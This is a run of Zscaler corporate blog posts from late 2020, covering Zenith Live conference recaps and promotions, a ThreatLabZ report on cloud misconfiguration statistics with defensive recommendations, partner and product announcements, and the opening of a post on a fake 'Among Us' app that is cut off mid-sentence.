Microsoft/Zscaler Zero Trust Cloud Model for the company’s recent accelerated shift to remote work: “This is not only a future-proof cloud topology,” he explained, “but it actually helped us implement a seamless business-continuity solution in the face of the pandemic.” I particularly enjoyed our day-two keynote. Journalist and author Andy Greenberg shared his experience tracking Sandworm, a Russian state-sponsored organization responsible for cyber attacks on Ukraine’s power infrastructure and on the 2018 Olympic Games. The cyber-terrorist group was also behind the catastrophic deployment of the NotPetya malware, which impacted major organizations around the globe. One of many interesting points he made that we can learn from: Ukraine was uniquely positioned to respond to cyber attack. The power companies were staffed with operations personnel who could quickly get out to remote locations to turn the power back on. That simple planning -- intentional or not -- helped minimize collateral damage from the attack. I had a busy day sharing insights from our customers and partners. I had the pleasure to discuss with Siemens´ Anthony Atherton on how to secure OT and IoT workloads using the Zscaler platform. We showed together how Zscaler and Siemens are building new ways of working to ensure the protection of OT platforms for the enterprise. I then discussed just the “art of the possible” in transformation with Sandvik´s Sebastian Kemi & Takeda´s Thomas Likas. Finally, I was also lucky enough to share how Zscaler can help companies understand what their attack surface is, with the Zscaler Attack Surface Tool. After two days of engaging virtual sessions at Zenith Live 2020, I’m already looking forward to Zenith Live 2021 (which I fully expect will be an in-person event!). If you weren’t able to join this week, you can still attend: Visit ZenithLive for more information, and to register to access recordings of this week’s sessions. Thu, 10 Dec 2020 09:56:08 -0800 Nathan Howe Zenith Live 2020 EMEA Day One Wrap-Up This post originally appeared on LinkedIn. Today marked the start of Zenith Live 2020 for the EMEA region. Zenith Live is the premier global cloud summit, and this year it has gone virtual. For the first time, all sessions have been made available online and for free. This year’s theme is “Beyond Limits,” and day one has certainly gone beyond the limits of my expectations. I wanted to share a few highlights from the main stage: The day began with an energetic keynote presentation from Zscaler CEO Jay Chaudhry. He looked forward and one of his “bolder” visions for the future is that network security as we know it is dead. Jay described the global adaptation to a new way of work and presented an excellent architectural overview of the Zscaler Zero Trust Exchange and Zscaler’s new Cloud Protection services. He described these as “Holistic Cloud Security.” Jay provided some perspective, offering a sincere acknowledgement of the hard work and sacrifices of front-line workers, who inspire all of us seeking to preserve business continuity. With this, he also referenced the “extraordinary” accomplishments of two European companies who truly went beyond limits in response to the pandemic. Using Zscaler Private Access (ZPA), Essen, Germany-based DB Schenker moved 20,000+ employees to remote work in two weeks. Similarly, Siemens enabled 300,000 workers to work from anywhere in just three weeks. The responsibility for enabling these accomplishments falls to the stewards of the Zscaler Zero Trust Exchange platform, and Jay brought on Head of Operations Misha Kuperman, who described in detail how Zscaler adjusted to handle increased traffic loads brought on by the global shift to remote work. Next up on the virtual main stage were Zscaler President and CTO Amit Sinha and CIO Patrick Foxhoven, who gave an update on several new Zscaler product innovations. Particularly interesting was how Zscaler is integrating machine-learning technology into its behavioural analysis to deliver better security and user experience. Amit used a great real-world example of Zscaler AI used for advanced anomaly detection to flag a potential data-exfiltration risk. He also introduced Jairo Orea, Global CISO with Kimberly-Clark, who described how his company was able to switch to secure remote work in just two hours with Zscaler. Jay returned to speak with several IT leaders at Siemens: CIO Hanna Hennig, Head of IT Infrastructure Markus Holzheimer, VP of IT Strategy & Governance Frederik Janssen, and Head of DEC Anthony Atherton. Together, this group successfully guided the company’s operations through the recent pandemic. Their innovations are taking IoT/OT security to new levels using a zero-trust architecture, an especially important strategy for an organization with such advanced manufacturing operations. Another highlight was my colleague Kavitha Mariappan’s interview with Captain Scott Kelly. He shared his experiences as a U.S. Navy fighter pilot and astronaut, and described in incredible detail what it’s like to pilot a rocket. The example he set to go beyond limits can motivate all of us. (Also, his description of reentry into the earth’s atmosphere was fascinating.) This year we invited IT leaders from Technip FMC, Johnson Controls, BT, and PepsiCo joining Zscaler Senior Director of Transformation Strategy Pam Kubiatowski for the session “Women in IT: Confidence and Collaboration Bring IT Career Success". They shared their unique perspectives on getting ahead and offered advice for other leaders. Some sage counsel from former PepsiCo CIO Jody Davids: Don’t take it personally, develop resilience, and “when in doubt, act.” Off the main sessions, experts from Zscaler, Zscaler partners, and even Zscaler customers led breakouts and training covering everything from architectural overviews to product updates to in-depth hands-on demos. Some of the more popular topics among European attendees included a technical deep-dive on the new Zscaler Client Connector, an overview of Microsoft 365 deployment best practices, and a new-features-update on ZPA. In case you missed today’s sessions, don’t worry! Recordings will be available soon! And Zenith Live 2020 continues tomorrow at 8:00 AM GMT. I’m looking forward to hearing more details on new platform innovations from Amit and Patrick, as well as compelling customer journeys from CMA CGM, Sanofi, DB Schenker, Unilever, and others. And I’m expecting a great keynote from Andy Greenberg, the noted journalist and author of Sandworm, who will share his investigative reporting into the shadowy cyber-terrorist group behind NotPetya. Wed, 09 Dec 2020 08:35:57 -0800 Ismail Elmas The 2020 State of Cloud (In)Security Key findings 63% do not use multifactor authentication for cloud access 50% do not rotate access keys periodically 92% do not log access to cloud storage, eliminating the ability to conduct forensic analysis of an incident 26% of workloads expose SSH ports to the internet and 20% expose RDP Public cloud has made possible previously unheard of scale, performance, and agility for enterprises of all sizes. Development teams are getting new products and applications to production faster than ever before, accelerating digital transformation within their organizations. But cloud adoption hasn’t been without its speed bumps, not the least of which is security. Cloud vendors have dedicated enormous security resources to their platforms, yet barely a day goes by without news of another cloud security incident. Most of these incidents can be traced back to insecure use of cloud services rather than to security flaws in the services themselves. To take a look at the current state of public cloud security, the Zscaler ThreatLabZ team collected anonymous statistics from customers running hundreds of thousands of workloads in AWS, Azure, and Google Cloud Platform (GCP). We also sampled user and application settings from customers using Microsoft 365 (M365). In this post, we’ll talk about the findings at a high level. Future posts will dive deeper into cloud-based attacks observed by the ThreatLabZ team, the risk of certain types of cloud misconfigurations, and the appropriate mitigations to put into place to protect against security incidents. Cloud security shared responsibility model Cloud security and compliance is a shared responsibility between the cloud service provider (CSP) and the customer. This has been very well advertised by all the CSPs where the security “of” the cloud service will be provided by the CSPs and the security “in” the cloud service is the responsibility of the customer. The split of responsibilities varies based on the type of cloud service being used. In a SaaS application, such as M365 or Salesforce, the cloud vendor is responsible for the entirety of the application’s security, from the physical security through the operating system(s) and the application itself. In an IaaS platform deployment, however, the customer is responsible for quite a bit more of the security and configuration of the services. Often, this includes the application code and even the operating system. In all cases, it is the enterprise’s responsibility to ensure that its data is properly protected, whether it lives in an enterprise data center or in a public cloud environment. Cloud security findings Upon reviewing the data, we found that a broad range of widely reported security issues are still not adequately mitigated in most environments. Key areas of deficiencies include: Lack of logging and monitoring If there is a compromise or other security incident, the first place to look for information on the event is log files. Even without a security failure, robust logging can help you fully understand what’s going on in your cloud environment. CSP tools, such as AWS CloudTrail and Azure Monitor, can help ensure that you have this information when needed. But they only work when enabled. Our analysis found that nearly 20 percent of implementations did not have CloudTrail enabled, and more than half did not take steps to maintain their logging beyond the default 90 days. Excessive permissions Compromised credentials are to blame for the vast majority of breaches, so it’s no surprise that cloud access keys and credentials are a primary target for bad actors. Regardless of the strength of your security, an attacker with the right credentials can walk right through the front door. Notable examples include Uber, where the personally identifiable information (PII) of 57 million users was leaked when attackers nabbed hardcoded AWS credentials from a GitHub repo, and Code Spaces, whose entire company assets were wiped out from AWS after a phishing incident. In our analysis, a high percentage of organizations neglected to use multifactor authentication and used hard-coded access keys that persist for far too long before they are rotated. Storage and encryption Publicly exposed cloud storage buckets have been the cause of a number of high-profile data exposures over the past several years. The L.A. Times, Tesla, the Republican Party, Verizon, and Dow Jones are but a few of the well-known organizations that have made this mistake. Despite the press coverage, cloud storage remains the most common area of cloud misconfiguration. Loose access policies, lack of encryption, policies that aren’t uniformly applied, and accessibility via unencrypted protocols are but a few of the most common issues. Network security groups Network security groups control the network connectivity of every service in a cloud deployment, acting like a network firewall. Unfortunately, this group represents the second-most widely observed area of misconfiguration after cloud storage. In some cases, these are the result of human error. In other cases, security groups are intentionally left open to facilitate connectivity or to avoid complexity. Externally exposed protocols such as Secure Shell (SSH) and Remote Desktop Protocol (RDP) are far too common and give attackers the ability to take over infected systems and move laterally within an organization’s cloud footprint. Lack of logging and monitoring In a typical cloud environment, gigabytes (GBs) of data are moving in and out all the time. To fully understand what’s going on in your cloud environment you’ll need a robust logging and monitoring system in place. For example, AWS CloudTrail is a logging service that gathers information about API calls, actions and changes within your AWS environment. CloudTrail logs contain critical information for audits and intrusion response. CloudTrail is enabled by default, and it logs all activities and events for 90 days. If you need more than 90 days, you’ll have to configure CloudTrail to deliver those events to an Amazon S3 bucket. AWS CloudWatch collects and tracks metrics, monitors log files, and deploys automated responses to common events in your environment. Impact In case of a compromise, logs are often the first source of information. They are a crucial part of incident response. Prevention Ensure CloudTrail/Azure Monitor is enabled (for master and provisioned accounts) Persist logs to S3 buckets/Azure Storage and configure lifecycle management Ensure S3 server-side encryption (at a minimum) Statistics Access logs were not enabled for 92 percent of S3 buckets 99 percent did not require server-side and in-transit encryption 18 percent had CloudTrail disabled 58 percent did not persist CloudTrail logs to S3 78 percent of S3 buckets did not have a lifecycle configuration 100 percent of EC2 instances did not have detailed monitoring enabled No accounts had Azure Monitor alerts configured Detailed diagnostics were not enabled for 89 percent of SQL databases or VMs on Azure Excessive permissions Impact Access keys and credentials are usually the first target for adversaries. With these in hand, it doesn’t matter which security policies or firewall rules are in place — the attacker has access to the entire cloud account. Examples Code Spaces was compromised in 2014 when its console credentials were phished. The adversaries wiped most of the company’s assets on AWS.1 PII of 57 million users were leaked from Uber in 2016 when attackers got access to hardcoded AWS credentials from a GitHub repository.2 Records belonging to 35 million customers of Malindo Air were leaked by former employees of a vendor who abused their access.3 Prevention Multifactor Authentication (MFA) Passwords are the predominant method for authentication to computing systems these days. It is important to choose a unique non-guessable password for each system that is being used. It is impossible for users to generate and memorize such passwords for hundreds of sites they use. The use of a second factor of authentication becomes all the more important. In our analysis of customer environments, we identified that a vast majority of the customers did not make use of either hardware or software based MFA. Key rotation Access keys in practice are the same as usernames and passwords, but used programmatically. Users do not treat these with the same precautions as for passwords. They end up hard-coded in code, saved in plain text, and more. To limit the exposure of keys, it is necessary to rotate them periodically. Also, unused keys must be revoked. Principle of least privilege Do not use the “root” user. Create users with the specific privileges they’d need. Assign policies to groups, not users, to ensure consistency. Use roles (IAM roles, Azure RBAC) instead of long-term access keys. Statistics Access keys were not rotated periodically in 50 percent of environments, resulting in exposed keys being usable for long periods of time. 63 percent of AWS console IAM users didn’t use MFA. In AWS accounts, 28 percent of access was through keys instead of roles or groups. (Roles ensure uniformity in access and the principle of least authority.) 84 percent assigned IAM policies to users instead of groups. 14 percent of IAM users were inactive. Storage and encryption What The most common misconfigurations still revolve around cloud storage buckets and the objects within, which pose a big confidentiality risk and make them the number-one target for data breaches. These misconfigurations encompass several commonly observed mistakes while initializing and operationalizing the storage buckets and the contents within them, such as: Loose storage bucket access policies Access policies not applied uniformly to all users Contents within the storage bucket not being encrypted Accessing contents from storage buckets over unsecured channels Backup storage and objects within them not being encrypted Impact These misconfigurations can lead to unauthorized users getting access to the storage buckets with the potential to: Download and expose proprietary data or sensitive data that are otherwise meant to be kept confidential Upload malicious programs/files including malware/ransomware Modify existing contents Destroy backup storage buckets Examples In 2018, the misconfigured storage bucket of L.A. Times was open to the internet, which eventually led to a massive cryptojacking attack. Around the same time, Tesla’s cloud account was breached by hackers who used the account for malicious activities such as cryptomining. The hackers were able to break into Tesla’s cloud account because the account wasn’t password-protected. Earlier this year, Twilio, the cloud communications platform-as-as-service company, reported an incident in which the misconfigured S3 bucket allowed bad actors to get into and modify the TaskRouter JavaScript SDK. Prevention Apply a stringent, uniform access policy The access policies applied to the storage buckets and the contents within them need to be stringent and uniform across all users. This will, if not eradicate completely, certainly minimize the instances of cloud storage getting exposed to the internet. Instead of tying the access policies to a user, a role-based access policy will enforce uniform access policies across the users. Encrypt the contents within storage buckets Encrypt the contents within storage buckets using the strongest ciphers so that in case of a data breach, it will be difficult for attackers to get the actual contents. This will help organizations minimize the damage if an incident occurs. Access contents from the storage buckets over encrypted channels Access the storage buckets and the contents of the storage over a secured channel by enabling SSL/TLS protocols rather than using a plain HTTP protocol. Secure back-up storage buckets and the contents within them It is important to provide strict uniform access policies and encryptions to the backup storage and the backed-up data within them. Frequent audits of access policy and automation It is recommended that organizations have a stringent audit process and perform frequent audits of storage bucket configuration settings and access policies. Sophisticated automation is essential for applying the best security practices uniformly across all users and to quickly detect any misconfigurations. Robust alerting It is very important to have a robust alerting mechanism in place to promptly notify cloud admins and users about misconfigurations. Statistics From the internal statistics collected by its CSPM organization, Zscaler observed that: About 78 percent of user accounts had the “Block Public Access” option disabled which poses much bigger risk of the storage buckets owned by these users getting exposed to the internet. Approximately 80 percent of accounts didn’t have disk encryption enabled and approximately 24 percent didn’t have encrypted Elastic Block Storage (EBS). Surprisingly, 91 percent of storage accounts were using non-secured communication channels while accessing data. While most of the unsecured communications channels were found when other modules were trying to access the contents from these buckets, most of the accounts had the SSL/TLS option enabled for content access from the internet. Some accounts still used HTTP instead of HTTPS while accessing objects remotely from the internet, which is more than enough for attackers to get access to the storage buckets and abuse them for malicious activities. Most Azure accounts had the storage buckets encrypted. This is probably the result of Azure’s default option of enforcing encryption to storage buckets. A small step like this can help to ensure uniform enforcement of security policies. About 85 percent of Azure accounts didn’t have a default network access rule set to deny. This can possibly expose the network to the internet and bad actors. Network security groups A network security group is like a network firewall to protect cloud workloads from the internet. The network security group controls the traffic coming in and going out to the cloud-based servers/systems based on the rules enforced. Misconfigurations in network security groups are the second most widely observed misconfigurations after misconfigurations in storage buckets. These misconfigurations can be the results of unintentional human error. At times, IT admins and/or users open the rules in the network security group for specific purposes such as debugging or allowing legitimate network operations remotely. But, when finished, they sometimes forget to revert back to the more stringent rules in the network security group/policy which hackers can leverage to penetrate into the cloud-based systems. Cloud users often have a tendency to enforce the default policy, which is sometimes insufficient for adequate security. Impact Improper rules configured to protect cloud-based systems can allow bad actors to probe into the network and identify the servers and services running on them that are open to the internet by performing reconnaissance attacks. Attackers can go further beyond the reconnaissance attempt and conduct denial-of-service (DoS) or distributed-denial-of-service (DDoS) attacks by sending too many ICMP packets continuously (known as ICMP flood or ping flood) to a cloud-based server and over-utilize server resources and/or choke the internet pipe. Misconfigured network security groups allow attackers to abuse the exposed services and ports to make their way into the cloud-based systems through a brute-force attack or by exploiting known vulnerabilities. By opening up multiple concurrent connections, attackers can also conduct DoS attacks and bring systems down. Once bad actors get in, they can perform any illegitimate activities, such as stealing or making sensitive data publicly available, implanting malware or ransomware, and moving laterally to other systems. Examples Last year, a sophisticated P2P botnet, named FritzsFrog, was discovered to have been actively abusing the SSH service for many months and was believed to have infected hundreds of servers. Earlier this year, Sophos identified a Cloud Snooper attack, which bypassed all security measures. According to the results of their investigation, the attacker is believed to have penetrated through open-to-internet SSH service by the brute-force technique. Also this year, new Chinese Linux malware targeting IoTs and servers, Kaiji, is believed to be using a similar SSH brute-force technique to penetrate and spread itself. Prevention Zscaler highly recommends implementing a zero trust network access (ZTNA) architecture to safeguard all your applications and only allow authorized users to access these applications. If done right using solutions like Zscaler Private Access, you can completely eliminate the external attack surface by blocking all inbound communication and preventing lateral propagation from an infected system. For organizations that are still in the process of implementing ZTNA, here are some short-term best practices when creating network security group/policy rules and applying them to cloud resources to minimize the risk of becoming easy targets for the attackers. Block inbound traffic to certain services and database servers from the internet It is critical to block incoming traffic to services such as SSH and RDP by blocking inbound sessions from the internet to TCP ports 22 and TCP port 3389, respectively. Exposing database services to the internet can have dangerous repercussions, so incoming traffic from the internet to database services must be blocked. If these services are running on other non-standard ports, block those ports explicitly. It is false to assume that they are now hidden from attackers because the services are running on non-standard ports. It is not that difficult for hackers to find these services even if they may be running on non-standard ports. If it is necessary to open up those services for legitimate network operations or remote debugging, they must be restricted to a specific set of IP addresses and not from anywhere from the internet Restrict outbound traffic Don’t ignore the outbound filters / rules and set them as stringent as possible. It is strongly advised to restrict the outbound server traffic to only those ports and those IP addresses that are necessary for the services to reach out for legitimate operations. These restrictions will help to reduce the lateral spread of infection or data exfiltration in case a system is compromised, thereby minimizing the damage. Block reconnaissance attempts Since ICMP ping is a very handy tool to test network connectivity, it is often used to discover systems. Block inbound and outbound ICMP traffic to make it harder for bad actors to know where the servers are. Block port scanning and IP scanning attempts. The scanning is mostly done in the initial phase, where attackers try to identify the systems and services that they can target.​​ Network segmentation Network segmentation designed with security in mind is absolutely critical because it is instrumental in limiting data breaches and reducing damages. Deploying Network Detection and Response to monitor traffic in real time to identify and mitigate threats quickly. Apply security patches promptly and always run the latest versions It is imperative to apply the latest available security patches for the applications and services running on cloud-based systems. Running older versions of software makes systems more vulnerable to exploitation and can eventually lead to a severe incident. Statistics Though the percentage of resources that were completely open to the internet was as low as 5 percent, this is still too high. Attackers can, and do, leverage these misconfigurations to get full access to an organization’s cloud environment. Zscaler found 26 percent of servers still exposing their SSH ports out to the internet and about 20 percent of servers with RDP exposed. These numbers remain very high and heighten the risk of cloud-based resources becoming compromised. Conclusion The use of public clouds is growing and so are the attacks targeting them. But that doesn’t mean public clouds are risky and organizations should stay away from them. The ThreatLabZ research showed that the cause of most successful cyberattacks on public cloud instances is due to security misconfigurations rather than vulnerabilities in these infrastructures. Organizations can take simple steps to ensure that their configurations are secure and their data is protected. 1 2 3 Tue, 08 Dec 2020 08:30:01 -0800 Deepen Desai Zscaler Cloud Protection, CXO Voices, Women in IT, and Meeting an Astronaut This post originally appeared on LinkedIn. It's amazing what an enterprise can accomplish when its IT professionals go beyond the limits of legacy applications, legacy architectures, and legacy thinking. Today, I and twelve thousand-plus close friends joined enterprise IT leaders and Zscaler execs for the first day of Zenith Live 2020 for the Americas region. Zenith Live is looking a little different this year. For the first time, the premier global cloud summit is virtual, with all sessions online and available for free. Below, a few day-one highlights. Zscaler CEO Jay Chaudhry kicked off the event with his keynote, in which he highlighted how the cloud has become the new data center and internet has become the new corporate network. He began his talk with a heartfelt thank-you to IT professionals around the globe, noting that in the last ten months, they have been called upon to go beyond their typical call of duty to enable secure remote access for their respective workforces. He cited DB Schenker and Siemens, two companies that were able to pivot tens, even hundreds of thousands of employees to work-from-anywhere in a matter of days. Today, we announced Zscaler Cloud Protection, a comprehensive portfolio that simplifies and automates protection for workloads on and between any public cloud. Zscaler Cloud Protection, combines Cloud Security Posture Management, Workload Segmentation, Cloud Connector, and the proven power of Zscaler Internet Access and Zscaler Private Access. Zscaler President and CTO Amit Sinha was joined by Zscaler CIO Patrick Foxhoven for an illuminating session highlighting several new Zscaler product and service innovations. Amit walked through the four key pillars of the Zscaler Zero Trust Exchange. Patrick shared some of the machine-learning analysis now available for Zscaler Private Access (ZPA) customers, and provided an overview of how ZPA can now perform "rich forms of inspection" of customer data "on the connector," protecting the privacy of the data, and ensuring no impact to throughput or performance. I had the privilege of speaking with Captain Scott Kelly, U.S. astronaut and former commander of the International Space Station. The American record-holder for the most consecutive days spent in outer space, Captain Kelly shared his unique perspectives on perseverance, resilience, and pushing beyond one's limits, and emphasized the importance of taking risks, being willing to make mistakes, and at times even being willing to fail. His mother became one of the first female police officers in New Jersey, and her story inspired him: “She had a plan,” explained Captain Kelly. “She worked hard. And she never ever gave up. And this was the first time in my life I saw the power of having this goal you might not be able to achieve, a plan to get there, and working really, really hard at something." Though I didn't get to join them in every session (!), Zenith Live attendees participated in close to fifty breakout sessions. Top draws for today included presentations on Zscaler CASB features, Zscaler Internet Access (ZIA), and Cloud Firewall/Cloud IPS. Finally, I moderated a panel of four IT leaders in the session "Women in IT: Confidence and Collaboration Bring IT Career Success." I spoke with Jaya Ramaswamy, SVP and CIO at Hitachi America, Ltd.; Amy Brady, CIO at KeyBank; Katie Jenkins, EVP and CISO at Liberty Mutual; and Jody Davids, former CIO at PepsiCo. We discussed career planning, developing support networks, instilling a growth mindset, and achieving work/life balance. Jody stressed the importance of confidence, and counseled attendees to step out of their comfort zones, "develop resilience," and especially to collaborate: "It's good for the team, it's good for the enterprise." Join me tomorrow for day two of Zenith Live 2020. We'll hear Zscaler customer stories from Takeda Pharmaceutical Company, Manpower Group, and other innovators. My colleagues Amit and Patrick will be back with more exciting product announcements, and you won't want to miss our day-two keynote from Wired Magazine journalist Andy Greenberg, the author of Sandworm, and the man who tracked the outbreak of the NotPetya malware. Tue, 08 Dec 2020 18:00:09 -0800 Kavitha Mariappan T-Minus 24 Hours Until Zenith Live Liftoff It’s almost here: Zenith Live mission control is ready to launch the first Zenith Live Virtual Cloud Summit tomorrow, December 8, starting at 8:30 a.m. (PST). The summit begins with an opening keynote from Zscaler CEO and Founder Jay Chaudhry. In addition to welcoming you to our third annual Zenith Live, Jay is sure to inspire with his perspectives on the state of the industry, the changes we saw in 2020, and the need for a zero trust approach to enable secure digital transformation. Quickly following Jay's opening remarks: An Innovation Showcase led by Zscaler CTO and President Amit Sinha, who digs down into current and upcoming innovations from Zscaler’s Zero Trust Exchange, and how they help companies advance their secure digital transformation journey. Voice of the Customer talks with pioneering IT leaders from companies such as Johnson Controls, Cushman & Wakefield, and Takeda Pharmaceuticals Company discussing how zero trust created agility and resiliency in their enterprises. As the American record holder for the most consecutive days spent in space, Captain Scott Kelly (day 1) will share his unique perspectives on testing one’s limits, the infinite wonder of the galaxy, and the indomitability of the human spirit. Wired reporter and acclaimed author Andy Greenberg (day 2) will discuss how a Russian state-sponsored cybercriminal gang launched the most devastating cyber attack ever, all chronicled in his book Sandworm. Microsoft keynote (day 2) where Zscaler’s partner showcases how our combined solutions bring better identity, visibility, and application performance to help enterprises better prepare for the cloud- and mobile-first world. Breakout sessions with content focused on the Zscaler solution foundations, the Zscaler Zero Trust Exchange platform, the secure access service edge (SASE) model, network transformation, security transformation, data protection, digital user experiences, and more. CxO panels where you can learn how CIO, CTO, and CISO pioneers from Fortune 500 companies successfully enacted secure digital transformation and overcame cultural and technological issues. Women in IT panel where you can hear successful IT leaders discuss expanding opportunities for women in the IT industry, share practical approaches and considerations to break down barriers to individual success, and highlight IT executive career progression strategies. Architectural workshops featuring Zscaler expert architects sharing their experiences leading network, security, and application transformations while reinventing safe connections in the cloud- and mobile-first era. Ask the Experts where experts lead an interactive session on how SASE and zero trust architectures can launch your organization beyond limits using secure digital transformation first steps, practices, and outcomes. Live Q&A demos that let you watch Zscaler experts explain exactly how to deploy and configure zero trust in your environments. Training tracks that will build your team's experts in deploying zero trust and SASE to solve your business challenges. Between sessions, be sure to visit the virtual Partner Hall, which showcases our ecosystem of IT transformation partners that help enterprises secure and simplify their adoption of cloud and mobility. And don't forget to participate in the summit-wide virtual game. Get points for every Zenith Live activity: attending a technical breakout, visiting a partner booth, watching a CxO panel, participating in a Q&A session, and more. The highest point earners at the end of the conference win a cool swag package. Register today and join us tomorrow! Mon, 07 Dec 2020 08:00:52 -0800 David Avery Simplifying and Automating Cloud Workload Protection As enterprises migrate from legacy data centers to the cloud, agility and speed often come at the expense of security. This doesn’t mean that the cloud is inherently insecure, however. In fact, Gartner has predicted that by 2023, 99 percent of cloud security incidents will be the enterprise’s own fault. The culprits? Well-intentioned employees with little knowledge of secure cloud configuration and the complexity of migrating static, legacy security architectures to highly dynamic cloud environments. The last few decades of information security have taught us that complexity is the enemy of security and that layering appliances and complicated policies leads to oversight and human error, or even worse, security compromises made to avoid that complexity. These challenges are exacerbated by the highly dynamic nature of today’s DevOps-driven cloud deployments, putting security teams at odds with development teams. Things don’t need to be this difficult. Cloud protection can best be achieved through a relatively simple strategy of securely configuring cloud deployments, minimizing your exposed attack surface, and eliminating lateral movement of malicious software and bad actors. Automation and easy-to-understand business level policies can ensure that your cloud security strategy adapts automatically and immediately to the changing nature of your cloud deployments, with minimal risk of human-caused error. Monitor and remediate cloud security posture The first step in protecting your cloud deployment is to securely configure all infrastructure and services. Developers and DevOps teams, who are not typically security experts, are moving fast to meet tight deadlines, often overlooking important configuration steps as they spin up new services. Upon deployment and continuously thereafter, these services must meet both internal control and regulatory requirements. Secure app access with no attack surface Once your infrastructure and services have been securely configured, the next piece of the puzzle is providing secure workforce and B2B access to cloud applications. Zero trust approaches make private apps invisible to the internet while allowing authorized users to access those applications. Because there is no VPN, the corresponding complexity and poor user experience can be avoided entirely. Secure app-to-app communication across clouds Once lateral threat movement has been eliminated across your cloud infrastructure, the next step is to secure workload communications to the internet, to other clouds, and to your data centers (DCs). Often overlooked, today’s workloads have legitimate needs for internet access, ranging from API connections to third-party services, software updates, and more. These workloads must be protected with the same level of security and control afforded to employee internet access. Proper implementation of this step means that your workloads will have safe, controlled access to required internet-based services with no exposed attack surface and no unwanted connections. Cloud-to-cloud and cloud-to-DC communications are another important component of security for your cloud footprint. Secure connectivity that can be deployed and updated quickly across any cloud or DC allows your cloud security infrastructure to adapt with the changing needs of the business. Eliminate lateral threat movement Even after environments have been configured for security best practices, it is still possible for bad actors, such as malicious insiders or hackers leveraging compromised credentials—or malware and ransomware—to wreak havoc on flat networks that allow unchecked lateral movement. Network-based firewall policies are static and unmanageably complex, leading to human error and stale policies that either expose workloads or are purposefully circumvented. Passthrough, stream-based firewall architectures exacerbate the problem. Identity-based segmentation offers a path toward eliminating the attack surface within and across clouds to stop lateral movement without the daunting complexities of network segmentation. Extending the network across clouds without VPN means eliminating the complexity, overhead, cost, and slowness of managing transit gateways, transit hubs, virtual firewalls, VPNs, routers, networking policies, and peering. Watch the video to learn more: Zscaler Cloud Protection, combining Cloud Security Posture Management, Workload Segmentation, Cloud Connector, and the proven power of Zscaler Internet Access and Zscaler Private Access, offers you a path toward this new reality. Contact us to learn more or see a custom demo. Tue, 08 Dec 2020 08:09:36 -0800 Rich Campagna FireMon and Zscaler Highlight Access Policy Management at Zenith Live 2020 Zenith Live is happening next week, and while you're at this year's virtual summit, we hope you will take time to check out our sponsors’ booths in the Virtual Partner Hall. As a Zenith Live Gold Sponsor, FireMon will be there highlighting the combined FireMon and Zscaler solution and how it provides enterprises with better company-wide access policy management and visibility. Leveraging Zscaler’s API, FireMon applies real-time policy analysis to ensure effective enforcement and network segmentation is in place. Customers can visualize configuration, policy, and rule usage statistics across all network security enforcement points through a single pane of glass. This centralized management approach allows customers to validate policies against regulatory or corporate standards, analyze access across the network, and monitor change to pinpoint risks quickly. Zscaler and FireMon provide: Policy Management. Normalize and manage policies across firewalls, next-generation firewalls, and cloud environments from various vendors from a single pane of glass. Policy Validation. Validate policies against regulatory requirements or custom-defined policies. Access Analysis. Confirm Zscaler security controls enforce the desired enterprise-wide access, security, and compliance policies. Rule Base Compliance. Monitor and ensure security controls continuously maintain compliance with defined access and rule policies. Identify rule, access, and configuration compliance violations. Network Mapping. Automatically collect and build Zscaler Cloud Firewall data into a visual and interactive model that provides network abstraction of access paths end-to-end with access path analysis and network map visualization. Rule Review. Analyze firewall configurations to identify hidden, unused, shadowed, or overly permissive rules that provide more access than necessary. Change Tracking. Track changes to Zscaler Cloud Firewall rules for compliance or rule review analysis. Ensure changes are certified. Identify when a change occurred, who made the change, and whether it was expected, and determine if the difference created a negative impact. See how the Zscaler and FireMon integration works: Using FireMon, joint customers can visualize and manage Zscaler Advanced Cloud Firewall policies alongside traditional firewalls and other network security policy enforcement points. This simplifies migration and ensures continuous visibility, control, and compliance across hybrid network environments. Check out the video below, describing how the partnership between Zscaler and FireMon helps secure digital transformation. Register now for Zenith Live—a virtual and free event starting December 8, 2020. Visit FireMon’s booth to learn more or talk to a FireMon expert about integrating Zscaler and FireMon solutions for better, more secure digital transformation. Mon, 30 Nov 2020 17:48:48 -0800 Amit Raikar Go Beyond Limits in Zenith Live’s Virtual Game We’re looking forward to seeing you at Zenith Live 2020 Virtual Cloud Summit on December 8-10. At Zenith Live, you can join other IT leaders and pioneers creating real change in their organizations by leading the drive to a mobile, cloud-first future. The theme of Zscaler's third annual cloud conference is “Beyond Limits.” Take the opportunity to go beyond limits during the conference: Your mission is to blow out our conference-wide game and rack up tons of points on the Zenith Live leaderboard in our Virtual Lounge! You can help some important charities in the process. For each activity during the conference—attending a breakout session, visiting a partner booth, watching a CxO panel, participating in a Q&A lecture, etc.—you earn “mission” points. The highest point earners at the end of the conference will win a cool swag package!* First prize. $100/€100 Amazon voucher, a Zenith Live T-shirt, and Andy Greenberg’s book Sandworm. Second prize. $50/€50 Amazon voucher, a Zenith Live T-shirt, and Andy Greenberg’s book Sandworm. Third prize. A Zenith Live T-shirt and Andy Greenberg’s book Sandworm. You can find a list of activities and their associated mission point values in the Virtual Lounge once Zenith Live begins. Daily scores are tabulated on Zenith Live’s mission scoreboard. When you’re in the virtual lounge, don’t forget to take a picture and socialize it on Twitter using #ZenithLive. Play the Whack-a-Threat game as well! Both activities earn mission points towards winning the game! Part of Zenith Live’s beyond limits mission is giving back to the community. We encourage you to explore and support two charities during the conference: Global Food Banking Network. The Global FoodBanking Network (GFN) is an international non-profit organization that nourishes the world’s hungry through uniting and advancing food banks in more than 40 countries. Girls Who Code. Girls Who Code is an international non-profit organization working to close the gender gap in technology and change the image of what a programmer looks like and does. We hope you’ll donate to these worthwhile charities before, during, and after Zenith Live. Leaderboard prize winners also have the option of donating the value of their prize to one of the above charities. Good luck with the game! Go beyond limits and explore every corner of Zenith Live to get the maximum number of points. Check the leaderboard daily to see who is in the lead. This year’s summit features inspiring speakers and practical training for CxOs, IT execs, network architects, security managers, and business leaders who seek secure digital transformation beyond limits.  Register now. *Some conference attendees are not allowed to accept gifts from third parties. Please check with your organization as to their policies. Fri, 27 Nov 2020 12:34:07 -0800 David Avery Among Us Imposter on Google Play Developing an app that is downloaded millions of times means success for the developer. But, quite often, it also means the app becomes a target for cybercriminals. This is the case with the wildly popular game Among Us. The game has been downloaded more than 100 million times from the Google Play store, so it’s not surprising that the Zscaler ThreatLabZ team has discovered a fake app portraying itself as Among Us, attempting to cash in on the real game’s popularity. The fake app is titled Amoungus. It cleverly makes a minor spelling change to the name and uses a picture similar to the one in the real app (shown in Figure 1). Users who are not very familiar with the app but have heard about it can be fooled into thinking this is the actual game. Once installed, Amoungus displays some fake downloading and processing activities, leading the user to think the game is downloading additional 